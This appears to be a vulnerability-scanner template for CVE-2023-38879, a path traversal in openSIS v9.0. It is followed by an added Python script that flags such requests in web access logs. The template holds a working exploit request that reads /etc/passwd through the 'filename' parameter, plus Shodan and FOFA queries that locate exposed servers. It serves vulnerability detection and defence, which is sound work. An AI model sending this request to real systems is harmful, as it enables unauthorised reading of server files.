A path traversal vulnerability exists in openSIS Classic Community Edition v9.0 via the 'filename' parameter in DownloadWindow.php. An unauthenticated remote attacker can exploit this to read arbitrary files on the server by manipulating file paths.
PoC code [public]
id: CVE-2023-38879
info:
  name: openSIS v9.0 - Path Traversal
  author: haliteroglu
  severity: high
  description: |
    A path traversal vulnerability exists in openSIS Classic Community Edition v9.0 via the 'filename' parameter in DownloadWindow.php. An unauthenticated remote attacker can exploit this to read arbitrary files on the server by manipulating file paths.
  reference:
    - https://github.com/dub-flow/vulnerability-research/tree/main/CVE-2023-38879
    - https://nvd.nist.gov/vuln/detail/CVE-2023-38879
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-38879
    cwe-id: CWE-22
    epss-score: 0.16369
    epss-percentile: 0.94631
    cpe: cpe:2.3:a:os4ed:opensis:9.0:*:*:*:community:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: os4ed
    product: opensis
    shodan-query: title:"openSIS"
    fofa-query: title="openSIS"
  tags: cve,cve2023,opensis,lfi
http:
  - method: GET
    path:
      - "{{BaseURL}}/DownloadWindow.php?filename=../../../../../../../../etc/passwd"
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
      - type: word
        part: header
        words:
          - "filename="
          - "text/html"
        condition: and
      - type: status
        status:
          - 200
# digest: 4a0a00473045022100eb3bc26631e13f24e82391ebf5413528e1059b74840bb51d5851927d11ed72ff02203721c0ea41c27a89286aec7fce5f66c3635cdf559b352d55093be3e5d554cc15:922c64590222798bb761d5b6d8e72950
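A defender-side check for the request pattern this template sends, as an added example that is not part of the original template or of openSIS: it scans web access log lines for DownloadWindow.php requests whose 'filename' value resolves to a parent-directory or absolute path. The combined log format, the sample lines and all function names are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line and status inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, max_rounds=3):
    """Undo nested URL encoding (%252e -> %2e -> .) for up to max_rounds layers."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(filename):
    """True if the decoded value has a '..' path segment or is an absolute path."""
    name = fully_decode(filename).replace("\\", "/")
    return (name.startswith("/") or bool(re.match(r"^[A-Za-z]:/", name))
            or ".." in name.split("/"))

def suspicious_requests(log_lines):
    """Return (target, status) for DownloadWindow.php hits whose filename traverses."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target, status = m.group(1), int(m.group(2))
        url = urlsplit(target)
        if not url.path.lower().endswith("/downloadwindow.php"):
            continue
        for value in parse_qs(url.query).get("filename", []):
            if is_traversal(value):
                hits.append((target, status))
                break
    return hits

# Constructed sample log lines (not taken from any real system).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /DownloadWindow.php?filename=report.pdf HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /DownloadWindow.php?filename=../../../../etc/passwd HTTP/1.1" 200 1843',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /DownloadWindow.php?filename=%252e%252e%252fsecret.txt HTTP/1.1" 404 210',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?filename=../x HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for target, status in suspicious_requests(SAMPLE_LOG):
        print(status, target)
```

A hit with status 200 is the higher-priority finding, since the template's own matchers require a 200 response before reporting the host as vulnerable.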